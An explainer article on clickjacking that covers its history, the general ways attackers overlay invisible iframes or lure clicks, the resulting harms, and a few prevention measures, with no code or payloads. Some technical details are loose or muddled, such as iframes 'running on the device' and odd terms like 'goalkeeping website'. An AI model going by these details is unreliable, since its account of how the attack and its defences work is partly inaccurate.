Clickjacking, also known as user-interface/UI redressing or iframe overlay, is an attack where a hacker tricks a user into clicking buttons or URLs, beneath which harmful codes are present. By clicking on the link, users unknowingly download malicious software, visit dangerous websites, provide sensitive information, among other adverse effects.
Robert Hansen and Jeremiah Grossman were the first researchers to identify clickjacking in 2008. Since then, many websites and browsers have recognised the problem and have put mechanisms in place to fight it.
How does clickjacking work?
A hacker embeds an invisible iframe under a clickable component. When a user clicks on the component, instead of (or in addition to) performing the desired action, hacker’s iframe runs on the device. An iframe (inline frame) is an HTML document that is inserted inside another HTML document. Think of it as a new browser window packed inside the web page. Hackers plant malicious codes in these iframes, and wait for the user to click on the component.
Hackers use various approaches to make clickjacking work. Some of them are listed below.
- By highjacking the website and inserting the malicious code on the page directly, for example, Cross-Site Scripting (XSS) attacks.
- By setting up an entirely new fake website (goalkeeping website) with an attractive name. When users visit the site and click on the links, a new malware-laden webpage might open. However, this requires that the hacker has access to the resources required for hosting websites.
- By inserting an inframe above the social media site components. For instance, a hacker can add the codes above the like button on Facebook platform. Similarly, hackers can insert malicious codes on different platforms, also.
- By inserting the code underneath the mouse cursor. This means that the script will run whenever the user clicks.
- By making the iframe visible and disguising it as a legit part of the page (UI redressing).
- By posting malicious links on social media platforms like Facebook and Twitter. Users, consumed by interest, click on the links. Here, hackers use social engineering along with clickjacking. The links can also prompt users to install additional software or plugins which, needless to say, are harmful.
Also read: What is Adware? 5 ways it harms your device and 8 ways to tackle it
How can clickjacking harm the device?
It entirely depends on the attacker. Hackers use clickjacking for purposes ranging from stealing Facebook likes to luring the user into giving personal information. They can also use clickjacking to perform other kinds of attacks on the device. As mentioned above, in many cases, it is impossible for the users even to detect the attack. It is worth mentioning that in clickjacking, hackers take advantage of users thirst for knowledge and human weaknesses to further their agendas.
By clickjacking, hackers can harm the device in a host of ways; some of them are as follows:
- Stealing passwords and other confidential information.
- Luring to the users to make unwanted purchases.
- Downloading malware on the device.
- Stealing the user’s history and preferences.
- Unauthorised financial transfers,
- Performing various other attacks like XSS attack, phishing, depending on hacker’s agenda.
Also read: What is a Spyware and ways to counter it
How to prevent clickjacking attacks?
A host of measures are proposed to counter clickjacking. Some of the methods are given below.
- One way is to design the website in such a way that every time there is a click; a confirmation window must open. In this way, users can assess whether the click was for the particular process they want, or not. Users can also report suspicious clicks.
- Another way is to change the website interface at regular intervals.
- Additionally, visibility detection on click can also be used. This technique can block clicks entirely if the browser detects that the clicks also contain an invisible click. However, the utility of this technique is limited, as this visibility detection has to be added to a specific component.
Also read: What is Email Spoofing and 9 ways to protect yourself